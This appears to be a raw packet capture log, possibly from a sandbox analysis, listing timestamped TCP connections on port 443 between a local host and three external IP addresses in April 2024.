Apr 26, 2024 23:23:24.587009907 CEST	443	49827	172.67.219.28	192.168.2.4
Apr 26, 2024 23:23:28.597457886 CEST	49827	443	192.168.2.4	172.67.219.28
Apr 26, 2024 23:23:28.600719929 CEST	49828	443	192.168.2.4	172.67.197.34
Apr 26, 2024 23:23:28.600761890 CEST	443	49828	172.67.197.34	192.168.2.4
Apr 26, 2024 23:23:28.601213932 CEST	49828	443	192.168.2.4	172.67.197.34
Apr 26, 2024 23:23:28.603425980 CEST	49828	443	192.168.2.4	172.67.197.34
Apr 26, 2024 23:23:28.603440046 CEST	443	49828	172.67.197.34	192.168.2.4
Apr 26, 2024 23:23:28.867418051 CEST	443	49828	172.67.197.34	192.168.2.4
Apr 26, 2024 23:23:28.867815018 CEST	49828	443	192.168.2.4	172.67.197.34
Apr 26, 2024 23:23:28.868210077 CEST	49828	443	192.168.2.4	172.67.197.34
Apr 26, 2024 23:23:28.868221998 CEST	443	49828	172.67.197.34	192.168.2.4
Apr 26, 2024 23:23:28.869779110 CEST	49828	443	192.168.2.4	172.67.197.34
Apr 26, 2024 23:23:28.869788885 CEST	443	49828	172.67.197.34	192.168.2.4
Apr 26, 2024 23:23:32.876120090 CEST	49828	443	192.168.2.4	172.67.197.34
Apr 26, 2024 23:23:32.879730940 CEST	49829	443	192.168.2.4	172.67.219.28
Apr 26, 2024 23:23:32.879770041 CEST	443	49829	172.67.219.28	192.168.2.4
Apr 26, 2024 23:23:32.879925966 CEST	49829	443	192.168.2.4	172.67.219.28
Apr 26, 2024 23:23:32.883434057 CEST	49829	443	192.168.2.4	172.67.219.28
Apr 26, 2024 23:23:32.883450985 CEST	443	49829	172.67.219.28	192.168.2.4
Apr 26, 2024 23:23:33.143871069 CEST	443	49829	172.67.219.28	192.168.2.4
Apr 26, 2024 23:23:33.144001961 CEST	49829	443	192.168.2.4	172.67.219.28
Apr 26, 2024 23:23:33.144381046 CEST	49829	443	192.168.2.4	172.67.219.28
Apr 26, 2024 23:23:33.144392014 CEST	443	49829	172.67.219.28	192.168.2.4
Apr 26, 2024 23:23:33.146511078 CEST	49829	443	192.168.2.4	172.67.219.28
Apr 26, 2024 23:23:33.146517038 CEST	443	49829	172.67.219.28	192.168.2.4
Apr 26, 2024 23:23:37.068025112 CEST	443	49829	172.67.219.28	192.168.2.4
Apr 26, 2024 23:23:37.068094969 CEST	49829	443	192.168.2.4	172.67.219.28
Apr 26, 2024 23:23:37.068125963 CEST	443	49829	172.67.219.28	192.168.2.4
Apr 26, 2024 23:23:37.068151951 CEST	443	49829	172.67.219.28	192.168.2.4
Apr 26, 2024 23:23:37.068165064 CEST	49829	443	192.168.2.4	172.67.219.28
Apr 26, 2024 23:23:37.068197012 CEST	49829	443	192.168.2.4	172.67.219.28
Apr 26, 2024 23:23:37.068320990 CEST	49829	443	192.168.2.4	172.67.219.28
Apr 26, 2024 23:23:37.068334103 CEST	443	49829	172.67.219.28	192.168.2.4
Apr 26, 2024 23:23:37.243411064 CEST	49830	443	192.168.2.4	172.67.219.28
Apr 26, 2024 23:23:37.243462086 CEST	443	49830	172.67.219.28	192.168.2.4
Apr 26, 2024 23:23:37.243774891 CEST	49830	443	192.168.2.4	172.67.219.28
Apr 26, 2024 23:23:37.243776083 CEST	49830	443	192.168.2.4	172.67.219.28
Apr 26, 2024 23:23:37.243813992 CEST	443	49830	172.67.219.28	192.168.2.4
Apr 26, 2024 23:23:37.503679991 CEST	443	49830	172.67.219.28	192.168.2.4
Apr 26, 2024 23:23:37.503753901 CEST	49830	443	192.168.2.4	172.67.219.28
Apr 26, 2024 23:23:37.504329920 CEST	49830	443	192.168.2.4	172.67.219.28
Apr 26, 2024 23:23:37.504334927 CEST	443	49830	172.67.219.28	192.168.2.4
Apr 26, 2024 23:23:37.505970955 CEST	49830	443	192.168.2.4	172.67.219.28
Apr 26, 2024 23:23:37.505980015 CEST	443	49830	172.67.219.28	192.168.2.4
Apr 26, 2024 23:23:41.501790047 CEST	49830	443	192.168.2.4	172.67.219.28
Apr 26, 2024 23:23:41.510339975 CEST	49831	443	192.168.2.4	172.67.197.34
Apr 26, 2024 23:23:41.510382891 CEST	443	49831	172.67.197.34	192.168.2.4
Apr 26, 2024 23:23:41.510461092 CEST	49831	443	192.168.2.4	172.67.197.34
Apr 26, 2024 23:23:41.510684967 CEST	49831	443	192.168.2.4	172.67.197.34
Apr 26, 2024 23:23:41.510696888 CEST	443	49831	172.67.197.34	192.168.2.4
Apr 26, 2024 23:23:41.770284891 CEST	443	49831	172.67.197.34	192.168.2.4
Apr 26, 2024 23:23:41.770353079 CEST	49831	443	192.168.2.4	172.67.197.34
Apr 26, 2024 23:23:41.770852089 CEST	49831	443	192.168.2.4	172.67.197.34
Apr 26, 2024 23:23:41.770864010 CEST	443	49831	172.67.197.34	192.168.2.4
Apr 26, 2024 23:23:41.772495985 CEST	49831	443	192.168.2.4	172.67.197.34
Apr 26, 2024 23:23:41.772504091 CEST	443	49831	172.67.197.34	192.168.2.4
Apr 26, 2024 23:23:45.768822908 CEST	49831	443	192.168.2.4	172.67.197.34
Apr 26, 2024 23:23:45.902775049 CEST	49832	443	192.168.2.4	104.21.59.82
Apr 26, 2024 23:23:45.902812004 CEST	443	49832	104.21.59.82	192.168.2.4
Apr 26, 2024 23:23:45.902868032 CEST	49832	443	192.168.2.4	104.21.59.82
Apr 26, 2024 23:23:45.903253078 CEST	49832	443	192.168.2.4	104.21.59.82
Apr 26, 2024 23:23:45.903273106 CEST	443	49832	104.21.59.82	192.168.2.4
Apr 26, 2024 23:23:46.167282104 CEST	443	49832	104.21.59.82	192.168.2.4
Apr 26, 2024 23:23:46.167376041 CEST	49832	443	192.168.2.4	104.21.59.82
Apr 26, 2024 23:23:46.168010950 CEST	49832	443	192.168.2.4	104.21.59.82
Apr 26, 2024 23:23:46.168016911 CEST	443	49832	104.21.59.82	192.168.2.4
Apr 26, 2024 23:23:46.169729948 CEST	49832	443	192.168.2.4	104.21.59.82
Apr 26, 2024 23:23:46.169744968 CEST	443	49832	104.21.59.82	192.168.2.4
Apr 26, 2024 23:23:50.174215078 CEST	49832	443	192.168.2.4	104.21.59.82
Apr 26, 2024 23:23:50.177059889 CEST	49833	443	192.168.2.4	172.67.197.34
Apr 26, 2024 23:23:50.177104950 CEST	443	49833	172.67.197.34	192.168.2.4
Apr 26, 2024 23:23:50.177253962 CEST	49833	443	192.168.2.4	172.67.197.34
Apr 26, 2024 23:23:50.177520990 CEST	49833	443	192.168.2.4	172.67.197.34
Apr 26, 2024 23:23:50.177535057 CEST	443	49833	172.67.197.34	192.168.2.4
Apr 26, 2024 23:23:50.437443018 CEST	443	49833	172.67.197.34	192.168.2.4
Apr 26, 2024 23:23:50.437777996 CEST	49833	443	192.168.2.4	172.67.197.34
Apr 26, 2024 23:23:50.439587116 CEST	49833	443	192.168.2.4	172.67.197.34
Apr 26, 2024 23:23:50.439587116 CEST	49833	443	192.168.2.4	172.67.197.34
Apr 26, 2024 23:23:50.439598083 CEST	443	49833	172.67.197.34	192.168.2.4
Apr 26, 2024 23:23:50.439611912 CEST	443	49833	172.67.197.34	192.168.2.4
Apr 26, 2024 23:23:54.454138041 CEST	49833	443	192.168.2.4	172.67.197.34
Apr 26, 2024 23:23:54.457000017 CEST	49834	443	192.168.2.4	104.21.59.82
Apr 26, 2024 23:23:54.457039118 CEST	443	49834	104.21.59.82	192.168.2.4
Apr 26, 2024 23:23:54.457246065 CEST	49834	443	192.168.2.4	104.21.59.82
Apr 26, 2024 23:23:54.459438086 CEST	49834	443	192.168.2.4	104.21.59.82
Apr 26, 2024 23:23:54.459454060 CEST	443	49834	104.21.59.82	192.168.2.4
Apr 26, 2024 23:23:54.718990088 CEST	443	49834	104.21.59.82	192.168.2.4
Apr 26, 2024 23:23:54.719106913 CEST	49834	443	192.168.2.4	104.21.59.82
Apr 26, 2024 23:23:54.719563961 CEST	49834	443	192.168.2.4	104.21.59.82
Apr 26, 2024 23:23:54.719572067 CEST	443	49834	104.21.59.82	192.168.2.4
Apr 26, 2024 23:23:54.723431110 CEST	49834	443	192.168.2.4	104.21.59.82
Apr 26, 2024 23:23:54.723437071 CEST	443	49834	104.21.59.82	192.168.2.4
Apr 26, 2024 23:23:58.736121893 CEST	49834	443	192.168.2.4	104.21.59.82
Apr 26, 2024 23:23:58.739466906 CEST	49835	443	192.168.2.4	172.67.197.34
Apr 26, 2024 23:23:58.739543915 CEST	443	49835	172.67.197.34	192.168.2.4
Apr 26, 2024 23:23:58.739711046 CEST	49835	443	192.168.2.4	172.67.197.34
Apr 26, 2024 23:23:58.739950895 CEST	49835	443	192.168.2.4	172.67.197.34
Apr 26, 2024 23:23:58.739985943 CEST	443	49835	172.67.197.34	192.168.2.4
Apr 26, 2024 23:23:58.998440981 CEST	443	49835	172.67.197.34	192.168.2.4
Apr 26, 2024 23:23:58.998498917 CEST	49835	443	192.168.2.4	172.67.197.34
Apr 26, 2024 23:23:58.998985052 CEST	49835	443	192.168.2.4	172.67.197.34
Apr 26, 2024 23:23:58.998994112 CEST	443	49835	172.67.197.34	192.168.2.4
Apr 26, 2024 23:23:59.000560999 CEST	49835	443	192.168.2.4	172.67.197.34
Apr 26, 2024 23:23:59.000566959 CEST	443	49835	172.67.197.34	192.168.2.4
Apr 26, 2024 23:24:02.986180067 CEST	49835	443	192.168.2.4	172.67.197.34
Apr 26, 2024 23:24:02.991117954 CEST	49836	443	192.168.2.4	104.21.59.82
Apr 26, 2024 23:24:02.991154909 CEST	443	49836	104.21.59.82	192.168.2.4
Apr 26, 2024 23:24:02.991219044 CEST	49836	443	192.168.2.4	104.21.59.82
Apr 26, 2024 23:24:02.991493940 CEST	49836	443	192.168.2.4	104.21.59.82
Apr 26, 2024 23:24:02.991503954 CEST	443	49836	104.21.59.82	192.168.2.4
Apr 26, 2024 23:24:03.253237963 CEST	443	49836	104.21.59.82	192.168.2.4
Apr 26, 2024 23:24:03.253325939 CEST	49836	443	192.168.2.4	104.21.59.82
Apr 26, 2024 23:24:03.253787994 CEST	49836	443	192.168.2.4	104.21.59.82
Apr 26, 2024 23:24:03.253818035 CEST	443	49836	104.21.59.82	192.168.2.4
Apr 26, 2024 23:24:03.255501032 CEST	49836	443	192.168.2.4	104.21.59.82
Apr 26, 2024 23:24:03.255525112 CEST	443	49836	104.21.59.82	192.168.2.4
Apr 26, 2024 23:24:06.899501085 CEST	443	49836	104.21.59.82	192.168.2.4
Apr 26, 2024 23:24:06.899826050 CEST	443	49836	104.21.59.82	192.168.2.4
Apr 26, 2024 23:24:06.900028944 CEST	49836	443	192.168.2.4	104.21.59.82
Apr 26, 2024 23:24:06.901616096 CEST	49836	443	192.168.2.4	104.21.59.82
Apr 26, 2024 23:24:06.901635885 CEST	443	49836	104.21.59.82	192.168.2.4
Apr 26, 2024 23:24:07.047753096 CEST	49837	443	192.168.2.4	104.21.59.82
Apr 26, 2024 23:24:07.047791958 CEST	443	49837	104.21.59.82	192.168.2.4
Apr 26, 2024 23:24:07.047874928 CEST	49837	443	192.168.2.4	104.21.59.82
Apr 26, 2024 23:24:07.048208952 CEST	49837	443	192.168.2.4	104.21.59.82
Apr 26, 2024 23:24:07.048223972 CEST	443	49837	104.21.59.82	192.168.2.4
Apr 26, 2024 23:24:07.312127113 CEST	443	49837	104.21.59.82	192.168.2.4
Apr 26, 2024 23:24:07.312201023 CEST	49837	443	192.168.2.4	104.21.59.82
Apr 26, 2024 23:24:07.312894106 CEST	49837	443	192.168.2.4	104.21.59.82
Apr 26, 2024 23:24:07.312907934 CEST	443	49837	104.21.59.82	192.168.2.4
Apr 26, 2024 23:24:07.315110922 CEST	49837	443	192.168.2.4	104.21.59.82
Apr 26, 2024 23:24:07.315123081 CEST	443	49837	104.21.59.82	192.168.2.4
Apr 26, 2024 23:24:11.315032005 CEST	49837	443	192.168.2.4	104.21.59.82
Apr 26, 2024 23:24:11.338948011 CEST	49838	443	192.168.2.4	172.67.197.34
Apr 26, 2024 23:24:11.338998079 CEST	443	49838	172.67.197.34	192.168.2.4
Apr 26, 2024 23:24:11.339062929 CEST	49838	443	192.168.2.4	172.67.197.34
Apr 26, 2024 23:24:11.339348078 CEST	49838	443	192.168.2.4	172.67.197.34
Apr 26, 2024 23:24:11.339361906 CEST	443	49838	172.67.197.34	192.168.2.4
Apr 26, 2024 23:24:11.598562956 CEST	443	49838	172.67.197.34	192.168.2.4
Apr 26, 2024 23:24:11.598639965 CEST	49838	443	192.168.2.4	172.67.197.34
Apr 26, 2024 23:24:11.599049091 CEST	49838	443	192.168.2.4	172.67.197.34
Apr 26, 2024 23:24:11.599065065 CEST	443	49838	172.67.197.34	192.168.2.4
Apr 26, 2024 23:24:11.600444078 CEST	49838	443	192.168.2.4	172.67.197.34
Apr 26, 2024 23:24:11.600461006 CEST	443	49838	172.67.197.34	192.168.2.4
Apr 26, 2024 23:24:15.610341072 CEST	49838	443	192.168.2.4	172.67.197.34
Apr 26, 2024 23:24:15.633452892 CEST	49839	443	192.168.2.4	104.21.59.82
Apr 26, 2024 23:24:15.633506060 CEST	443	49839	104.21.59.82	192.168.2.4
Apr 26, 2024 23:24:15.633735895 CEST	49839	443	192.168.2.4	104.21.59.82
Apr 26, 2024 23:24:15.633951902 CEST	49839	443	192.168.2.4	104.21.59.82
Apr 26, 2024 23:24:15.633965969 CEST	443	49839	104.21.59.82	192.168.2.4
Apr 26, 2024 23:24:15.902251005 CEST	443	49839	104.21.59.82	192.168.2.4
Apr 26, 2024 23:24:15.902324915 CEST	49839	443	192.168.2.4	104.21.59.82
Apr 26, 2024 23:24:15.902807951 CEST	49839	443	192.168.2.4	104.21.59.82
Apr 26, 2024 23:24:15.902817965 CEST	443	49839	104.21.59.82	192.168.2.4
Apr 26, 2024 23:24:15.904381990 CEST	49839	443	192.168.2.4	104.21.59.82
Apr 26, 2024 23:24:15.904387951 CEST	443	49839	104.21.59.82	192.168.2.4
Apr 26, 2024 23:24:19.906812906 CEST	49839	443	192.168.2.4	104.21.59.82
Apr 26, 2024 23:24:19.921983004 CEST	49840	443	192.168.2.4	172.67.197.34
Apr 26, 2024 23:24:19.922019005 CEST	443	49840	172.67.197.34	192.168.2.4
Apr 26, 2024 23:24:19.922103882 CEST	49840	443	192.168.2.4	172.67.197.34
Apr 26, 2024 23:24:19.922403097 CEST	49840	443	192.168.2.4	172.67.197.34
Apr 26, 2024 23:24:19.922415018 CEST	443	49840	172.67.197.34	192.168.2.4
Apr 26, 2024 23:24:20.181992054 CEST	443	49840	172.67.197.34	192.168.2.4
Apr 26, 2024 23:24:20.187557936 CEST	49840	443	192.168.2.4	172.67.197.34
Apr 26, 2024 23:24:20.189352036 CEST	49840	443	192.168.2.4	172.67.197.34
Apr 26, 2024 23:24:20.189352036 CEST	49840	443	192.168.2.4	172.67.197.34
Apr 26, 2024 23:24:20.189361095 CEST	443	49840	172.67.197.34	192.168.2.4
Apr 26, 2024 23:24:20.189371109 CEST	443	49840	172.67.197.34	192.168.2.4
Apr 26, 2024 23:24:24.196301937 CEST	49840	443	192.168.2.4	172.67.197.34
Apr 26, 2024 23:24:24.201719999 CEST	49841	443	192.168.2.4	104.21.59.82
Apr 26, 2024 23:24:24.201762915 CEST	443	49841	104.21.59.82	192.168.2.4
Apr 26, 2024 23:24:24.202449083 CEST	49841	443	192.168.2.4	104.21.59.82
Apr 26, 2024 23:24:24.202528954 CEST	49841	443	192.168.2.4	104.21.59.82
Apr 26, 2024 23:24:24.202538967 CEST	443	49841	104.21.59.82	192.168.2.4
Apr 26, 2024 23:24:24.463351965 CEST	443	49841	104.21.59.82	192.168.2.4
Apr 26, 2024 23:24:24.463532925 CEST	49841	443	192.168.2.4	104.21.59.82
Apr 26, 2024 23:24:24.465311050 CEST	49841	443	192.168.2.4	104.21.59.82
Apr 26, 2024 23:24:24.465311050 CEST	49841	443	192.168.2.4	104.21.59.82
Apr 26, 2024 23:24:24.465329885 CEST	443	49841	104.21.59.82	192.168.2.4
Apr 26, 2024 23:24:24.465353012 CEST	443	49841	104.21.59.82	192.168.2.4
Apr 26, 2024 23:24:28.259555101 CEST	443	49841	104.21.59.82	192.168.2.4
Apr 26, 2024 23:24:28.259691954 CEST	443	49841	104.21.59.82	192.168.2.4
Apr 26, 2024 23:24:28.259772062 CEST	49841	443	192.168.2.4	104.21.59.82
Apr 26, 2024 23:24:28.260020971 CEST	49841	443	192.168.2.4	104.21.59.82
Apr 26, 2024 23:24:28.260035992 CEST	443	49841	104.21.59.82	192.168.2.4
Apr 26, 2024 23:24:28.404500961 CEST	49842	443	192.168.2.4	104.21.59.82
Apr 26, 2024 23:24:28.404542923 CEST	443	49842	104.21.59.82	192.168.2.4
Apr 26, 2024 23:24:28.405740023 CEST	49842	443	192.168.2.4	104.21.59.82
Apr 26, 2024 23:24:28.406373024 CEST	49842	443	192.168.2.4	104.21.59.82
Apr 26, 2024 23:24:28.406388998 CEST	443	49842	104.21.59.82	192.168.2.4
Apr 26, 2024 23:24:28.665566921 CEST	443	49842	104.21.59.82	192.168.2.4
Apr 26, 2024 23:24:28.666348934 CEST	49842	443	192.168.2.4	104.21.59.82
Apr 26, 2024 23:24:28.668003082 CEST	49842	443	192.168.2.4	104.21.59.82
Apr 26, 2024 23:24:28.668015003 CEST	443	49842	104.21.59.82	192.168.2.4
Apr 26, 2024 23:24:28.669467926 CEST	49842	443	192.168.2.4	104.21.59.82
Apr 26, 2024 23:24:28.669473886 CEST	443	49842	104.21.59.82	192.168.2.4
Apr 26, 2024 23:24:32.673814058 CEST	49842	443	192.168.2.4	104.21.59.82
Apr 26, 2024 23:24:32.677624941 CEST	49843	443	192.168.2.4	172.67.197.34
Apr 26, 2024 23:24:32.677717924 CEST	443	49843	172.67.197.34	192.168.2.4
Apr 26, 2024 23:24:32.677928925 CEST	49843	443	192.168.2.4	172.67.197.34
Apr 26, 2024 23:24:32.678152084 CEST	49843	443	192.168.2.4	172.67.197.34
Apr 26, 2024 23:24:32.678200006 CEST	443	49843	172.67.197.34	192.168.2.4
Apr 26, 2024 23:24:32.938023090 CEST	443	49843	172.67.197.34	192.168.2.4
Apr 26, 2024 23:24:32.938178062 CEST	49843	443	192.168.2.4	172.67.197.34
Apr 26, 2024 23:24:32.940268993 CEST	49843	443	192.168.2.4	172.67.197.34
Apr 26, 2024 23:24:32.940269947 CEST	49843	443	192.168.2.4	172.67.197.34
Apr 26, 2024 23:24:32.940289974 CEST	443	49843	172.67.197.34	192.168.2.4
Apr 26, 2024 23:24:32.940325975 CEST	443	49843	172.67.197.34	192.168.2.4
Apr 26, 2024 23:24:36.939486027 CEST	49843	443	192.168.2.4	172.67.197.34
Apr 26, 2024 23:24:37.046657085 CEST	49844	443	192.168.2.4	104.21.59.82
Apr 26, 2024 23:24:37.046736002 CEST	443	49844	104.21.59.82	192.168.2.4
Apr 26, 2024 23:24:37.046808004 CEST	49844	443	192.168.2.4	104.21.59.82
Apr 26, 2024 23:24:37.047156096 CEST	49844	443	192.168.2.4	104.21.59.82
Apr 26, 2024 23:24:37.047193050 CEST	443	49844	104.21.59.82	192.168.2.4
Apr 26, 2024 23:24:37.322115898 CEST	443	49844	104.21.59.82	192.168.2.4
Apr 26, 2024 23:24:37.322184086 CEST	49844	443	192.168.2.4	104.21.59.82
Apr 26, 2024 23:24:37.322685003 CEST	49844	443	192.168.2.4	104.21.59.82
Apr 26, 2024 23:24:37.322702885 CEST	443	49844	104.21.59.82	192.168.2.4
Apr 26, 2024 23:24:37.324400902 CEST	49844	443	192.168.2.4	104.21.59.82
Apr 26, 2024 23:24:37.324414015 CEST	443	49844	104.21.59.82	192.168.2.4
Apr 26, 2024 23:24:41.329763889 CEST	49844	443	192.168.2.4	104.21.59.82
Apr 26, 2024 23:24:41.341429949 CEST	49845	443	192.168.2.4	172.67.197.34
Apr 26, 2024 23:24:41.341480970 CEST	443	49845	172.67.197.34	192.168.2.4
Apr 26, 2024 23:24:41.341557026 CEST	49845	443	192.168.2.4	172.67.197.34
Apr 26, 2024 23:24:41.341836929 CEST	49845	443	192.168.2.4	172.67.197.34
Apr 26, 2024 23:24:41.341850996 CEST	443	49845	172.67.197.34	192.168.2.4
Apr 26, 2024 23:24:41.605099916 CEST	443	49845	172.67.197.34	192.168.2.4
Apr 26, 2024 23:24:41.605159044 CEST	49845	443	192.168.2.4	172.67.197.34
Apr 26, 2024 23:24:41.605705976 CEST	49845	443	192.168.2.4	172.67.197.34
Apr 26, 2024 23:24:41.605715990 CEST	443	49845	172.67.197.34	192.168.2.4
Apr 26, 2024 23:24:41.607789040 CEST	49845	443	192.168.2.4	172.67.197.34
Apr 26, 2024 23:24:41.607795000 CEST	443	49845	172.67.197.34	192.168.2.4
Apr 26, 2024 23:24:45.611468077 CEST	49845	443	192.168.2.4	172.67.197.34
Apr 26, 2024 23:24:45.622530937 CEST	49846	443	192.168.2.4	104.21.59.82
Apr 26, 2024 23:24:45.622579098 CEST	443	49846	104.21.59.82	192.168.2.4
Apr 26, 2024 23:24:45.622663975 CEST	49846	443	192.168.2.4	104.21.59.82
Apr 26, 2024 23:24:45.622977972 CEST	49846	443	192.168.2.4	104.21.59.82
Apr 26, 2024 23:24:45.623006105 CEST	443	49846	104.21.59.82	192.168.2.4
Apr 26, 2024 23:24:45.889394999 CEST	443	49846	104.21.59.82	192.168.2.4
Apr 26, 2024 23:24:45.889472961 CEST	49846	443	192.168.2.4	104.21.59.82
Apr 26, 2024 23:24:45.890436888 CEST	49846	443	192.168.2.4	104.21.59.82
Apr 26, 2024 23:24:45.890443087 CEST	443	49846	104.21.59.82	192.168.2.4
Apr 26, 2024 23:24:45.892077923 CEST	49846	443	192.168.2.4	104.21.59.82
Apr 26, 2024 23:24:45.892085075 CEST	443	49846	104.21.59.82	192.168.2.4
Apr 26, 2024 23:24:49.892162085 CEST	49846	443	192.168.2.4	104.21.59.82
Apr 26, 2024 23:24:49.897382975 CEST	49847	443	192.168.2.4	172.67.197.34
Apr 26, 2024 23:24:49.897418022 CEST	443	49847	172.67.197.34	192.168.2.4
Apr 26, 2024 23:24:49.897470951 CEST	49847	443	192.168.2.4	172.67.197.34
Apr 26, 2024 23:24:49.897792101 CEST	49847	443	192.168.2.4	172.67.197.34
Apr 26, 2024 23:24:49.897809029 CEST	443	49847	172.67.197.34	192.168.2.4
Apr 26, 2024 23:24:50.161047935 CEST	443	49847	172.67.197.34	192.168.2.4
Apr 26, 2024 23:24:50.163990974 CEST	49847	443	192.168.2.4	172.67.197.34
Apr 26, 2024 23:24:50.163990974 CEST	49847	443	192.168.2.4	172.67.197.34
Apr 26, 2024 23:24:50.164025068 CEST	443	49847	172.67.197.34	192.168.2.4
Apr 26, 2024 23:24:50.167488098 CEST	49847	443	192.168.2.4	172.67.197.34
Apr 26, 2024 23:24:50.167525053 CEST	443	49847	172.67.197.34	192.168.2.4
Apr 26, 2024 23:24:54.173218966 CEST	49847	443	192.168.2.4	172.67.197.34
Apr 26, 2024 23:24:54.217511892 CEST	49848	443	192.168.2.4	104.21.59.82
Apr 26, 2024 23:24:54.217570066 CEST	443	49848	104.21.59.82	192.168.2.4
Apr 26, 2024 23:24:54.217777967 CEST	49848	443	192.168.2.4	104.21.59.82
Apr 26, 2024 23:24:54.223500967 CEST	49848	443	192.168.2.4	104.21.59.82
Apr 26, 2024 23:24:54.223522902 CEST	443	49848	104.21.59.82	192.168.2.4
Apr 26, 2024 23:24:54.487792969 CEST	443	49848	104.21.59.82	192.168.2.4
Apr 26, 2024 23:24:54.490644932 CEST	49848	443	192.168.2.4	104.21.59.82
Apr 26, 2024 23:24:54.492412090 CEST	49848	443	192.168.2.4	104.21.59.82
Apr 26, 2024 23:24:54.492412090 CEST	49848	443	192.168.2.4	104.21.59.82
Apr 26, 2024 23:24:54.492423058 CEST	443	49848	104.21.59.82	192.168.2.4
Apr 26, 2024 23:24:54.492443085 CEST	443	49848	104.21.59.82	192.168.2.4
Apr 26, 2024 23:24:58.487519026 CEST	49848	443	192.168.2.4	104.21.59.82
Apr 26, 2024 23:24:58.499495983 CEST	49849	443	192.168.2.4	172.67.197.34
Apr 26, 2024 23:24:58.499541044 CEST	443	49849	172.67.197.34	192.168.2.4
Apr 26, 2024 23:24:58.500104904 CEST	49849	443	192.168.2.4	172.67.197.34
Apr 26, 2024 23:24:58.500312090 CEST	49849	443	192.168.2.4	172.67.197.34
Apr 26, 2024 23:24:58.500329018 CEST	443	49849	172.67.197.34	192.168.2.4
Apr 26, 2024 23:24:58.762955904 CEST	443	49849	172.67.197.34	192.168.2.4
Apr 26, 2024 23:24:58.763554096 CEST	49849	443	192.168.2.4	172.67.197.34
Apr 26, 2024 23:24:58.764332056 CEST	49849	443	192.168.2.4	172.67.197.34
Apr 26, 2024 23:24:58.764342070 CEST	443	49849	172.67.197.34	192.168.2.4
Apr 26, 2024 23:24:58.765350103 CEST	49849	443	192.168.2.4	172.67.197.34
Apr 26, 2024 23:24:58.765356064 CEST	443	49849	172.67.197.34	192.168.2.4
Apr 26, 2024 23:25:02.751854897 CEST	49849	443	192.168.2.4	172.67.197.34
Apr 26, 2024 23:25:02.767779112 CEST	49850	443	192.168.2.4	104.21.59.82
Apr 26, 2024 23:25:02.767811060 CEST	443	49850	104.21.59.82	192.168.2.4
Apr 26, 2024 23:25:02.771547079 CEST	49850	443	192.168.2.4	104.21.59.82
Apr 26, 2024 23:25:02.771862030 CEST	49850	443	192.168.2.4	104.21.59.82
Apr 26, 2024 23:25:02.771874905 CEST	443	49850	104.21.59.82	192.168.2.4
Apr 26, 2024 23:25:03.030919075 CEST	443	49850	104.21.59.82	192.168.2.4
Apr 26, 2024 23:25:03.034117937 CEST	49850	443	192.168.2.4	104.21.59.82
Apr 26, 2024 23:25:03.036055088 CEST	49850	443	192.168.2.4	104.21.59.82
Apr 26, 2024 23:25:03.036055088 CEST	49850	443	192.168.2.4	104.21.59.82
Apr 26, 2024 23:25:03.036070108 CEST	443	49850	104.21.59.82	192.168.2.4
Apr 26, 2024 23:25:03.036083937 CEST	443	49850	104.21.59.82	192.168.2.4
Apr 26, 2024 23:25:07.049525023 CEST	49850	443	192.168.2.4	104.21.59.82
Apr 26, 2024 23:25:07.065753937 CEST	49851	443	192.168.2.4	172.67.197.34
Apr 26, 2024 23:25:07.065800905 CEST	443	49851	172.67.197.34	192.168.2.4
Apr 26, 2024 23:25:07.066163063 CEST	49851	443	192.168.2.4	172.67.197.34
Apr 26, 2024 23:25:07.066163063 CEST	49851	443	192.168.2.4	172.67.197.34
Apr 26, 2024 23:25:07.066200972 CEST	443	49851	172.67.197.34	192.168.2.4
Apr 26, 2024 23:25:07.336796999 CEST	443	49851	172.67.197.34	192.168.2.4
Apr 26, 2024 23:25:07.336885929 CEST	49851	443	192.168.2.4	172.67.197.34
Apr 26, 2024 23:25:07.337373018 CEST	49851	443	192.168.2.4	172.67.197.34
Apr 26, 2024 23:25:07.337380886 CEST	443	49851	172.67.197.34	192.168.2.4
Apr 26, 2024 23:25:07.339030027 CEST	49851	443	192.168.2.4	172.67.197.34
Apr 26, 2024 23:25:07.339036942 CEST	443	49851	172.67.197.34	192.168.2.4
Apr 26, 2024 23:25:11.345494986 CEST	49851	443	192.168.2.4	172.67.197.34
Apr 26, 2024 23:25:11.353296041 CEST	49852	443	192.168.2.4	104.21.59.82
Apr 26, 2024 23:25:11.353329897 CEST	443	49852	104.21.59.82	192.168.2.4
Apr 26, 2024 23:25:11.353389978 CEST	49852	443	192.168.2.4	104.21.59.82
Apr 26, 2024 23:25:11.353738070 CEST	49852	443	192.168.2.4	104.21.59.82
Apr 26, 2024 23:25:11.353751898 CEST	443	49852	104.21.59.82	192.168.2.4
Apr 26, 2024 23:25:11.613179922 CEST	443	49852	104.21.59.82	192.168.2.4
Apr 26, 2024 23:25:11.613249063 CEST	49852	443	192.168.2.4	104.21.59.82
Apr 26, 2024 23:25:11.613929033 CEST	49852	443	192.168.2.4	104.21.59.82
Apr 26, 2024 23:25:11.613944054 CEST	443	49852	104.21.59.82	192.168.2.4
Apr 26, 2024 23:25:11.616291046 CEST	49852	443	192.168.2.4	104.21.59.82
Apr 26, 2024 23:25:11.616297007 CEST	443	49852	104.21.59.82	192.168.2.4
Apr 26, 2024 23:25:15.626043081 CEST	49852	443	192.168.2.4	104.21.59.82
Apr 26, 2024 23:25:15.633744001 CEST	49853	443	192.168.2.4	172.67.197.34
Apr 26, 2024 23:25:15.633783102 CEST	443	49853	172.67.197.34	192.168.2.4
Apr 26, 2024 23:25:15.633845091 CEST	49853	443	192.168.2.4	172.67.197.34
Apr 26, 2024 23:25:15.634191036 CEST	49853	443	192.168.2.4	172.67.197.34
Apr 26, 2024 23:25:15.634206057 CEST	443	49853	172.67.197.34	192.168.2.4
Apr 26, 2024 23:25:15.894989967 CEST	443	49853	172.67.197.34	192.168.2.4
Apr 26, 2024 23:25:15.895049095 CEST	49853	443	192.168.2.4	172.67.197.34
Apr 26, 2024 23:25:15.895541906 CEST	49853	443	192.168.2.4	172.67.197.34
Apr 26, 2024 23:25:15.895549059 CEST	443	49853	172.67.197.34	192.168.2.4
Apr 26, 2024 23:25:15.897272110 CEST	49853	443	192.168.2.4	172.67.197.34
Apr 26, 2024 23:25:15.897278070 CEST	443	49853	172.67.197.34	192.168.2.4
Apr 26, 2024 23:25:19.908216953 CEST	49853	443	192.168.2.4	172.67.197.34
Apr 26, 2024 23:25:19.916610956 CEST	49854	443	192.168.2.4	104.21.59.82
Apr 26, 2024 23:25:19.916707993 CEST	443	49854	104.21.59.82	192.168.2.4
Apr 26, 2024 23:25:19.916800976 CEST	49854	443	192.168.2.4	104.21.59.82
Apr 26, 2024 23:25:19.917036057 CEST	49854	443	192.168.2.4	104.21.59.82
